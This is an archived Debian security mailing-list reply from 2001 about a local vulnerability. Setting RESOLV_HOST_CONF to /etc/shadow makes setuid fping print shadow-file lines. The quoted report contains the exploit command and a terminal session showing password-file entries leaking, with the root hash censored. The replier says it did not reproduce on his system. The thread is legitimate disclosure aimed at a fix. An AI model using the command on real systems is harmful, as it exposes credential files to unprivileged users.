Re[2]: 'export RESOLV_HOST_CONF= any file you want' local vulnerability

To: thomas lakofski <thomas@88.net>
Cc: security@debian.org, debian-security@lists.debian.org
Subject: Re[2]: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
From: Kevin <cog@iwz.com>
Date: Mon, 8 Jan 2001 11:13:49 -0700
Message-id: <[🔎] 47250783707.20010108111349@iwz.com>
Reply-to: Kevin <cog@iwz.com>
In-reply-to: <[🔎] Pine.LNX.4.31.0101081752230.25739-100000@io.88.net>
References: <[🔎] Pine.LNX.4.31.0101081752230.25739-100000@io.88.net>


When I tried it, I did not get the same results.

-rwsr-xr-x    1 root     root        19728 Oct 30  1999 /usr/bin/fping*

ldd `which fping`
        libc.so.6 => /lib/libc.so.6 (0x00127000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x00110000)

ping localhost
PING localhost (127.0.0.1): 56 data bytes

--- localhost ping statistics ---
6 packets transmitted, 0 packets received, 100% packet loss

fping localhost
localhost is unreachable




-- 
Kevin - cog@iwz.com



-- Original message --

> Since I've not had any response yet, I thought I'd give a demonstration of how
> nasty this is:

>   Script started on Mon Jan  8 17:48:23 2001
>   thomas@io:~$ export RESOLV_HOST_CONF=/etc/shadow
>   thomas@io:~$ ping localhost
>   PING localhost (127.0.0.1): 56 data bytes

>   --- localhost ping statistics ---
>   2 packets transmitted, 0 packets received, 100% packet loss
>   thomas@io:~$ fping localhost
>   /etc/shadow: line 1: bad command `root:<censored>:11063:0:99999:7:::'

>   [snip]

>   /etc/shadow: line 73: bad command `gdm:!:11285:0:99999:7:::'
>   localhost is unreachable
>   thomas@io:~$ ls -l `which fping`
>   -rwsr-xr-x    1 root     root        19728 May 15  2000 /usr/bin/fping
>   thomas@io:~$ ls -l `which ping`
>   -rwsr-xr-x    1 root     root        15036 Dec 31 04:11 /bin/ping
>   thomas@io:~$ ldd `which fping`
>         libc.so.6 => /lib/libc.so.6 (0x40021000)
>         /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
>   thomas@io:~$ ldd `which ping`
>         libc.so.6 => /lib/libc.so.6 (0x40021000)
>         /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
>   thomas@io:~$ exit

>   Script done on Mon Jan  8 17:49:42 2001

> It seems to work for some setuid programs, but not others.  I'm running the
> most recent packages from unstable as of today:

> ii  libc6          2.2-9          GNU C Library: Shared libraries and Timezone
> ii  netkit-ping    0.10-5         The ping utility from netkit
> ii  fping          2.2b1-2        Send ICMP ECHO_REQUEST packets to network ho

> cheers,

> Thomas


> On Mon, 8 Jan 2001, thomas lakofski wrote:

>> From: thomas lakofski <thomas@88.net>
>> To: security@debian.org, debian-security@lists.debian.org
>> Date: Mon, 8 Jan 2001 13:34:52 +0000 (GMT)
>> Subject: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
>>
>> Hi,
>>
>> A friend of mine just tried this against my unstable box and successfully
>> obtained the contents of /etc/shadow.
>>
>> I imagine that this is a problem in libc -- I'll leave it to
>> security@debian.org to file bug reports.
>>
>> cheers,
>>
>> Thomas
>>
>>

Reply to:

Follow-Ups:
- Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
  - From: Christian Hammers <ch@westend.com>
- Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
  - From: Andres Salomon <dilinger@mp3revolution.net>

References:
- Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
  - From: thomas lakofski <thomas@88.net>

Prev by Date: Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
Next by Date: Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
Previous by thread: Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
Next by thread: Re: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
Index(es):
- Date
- Thread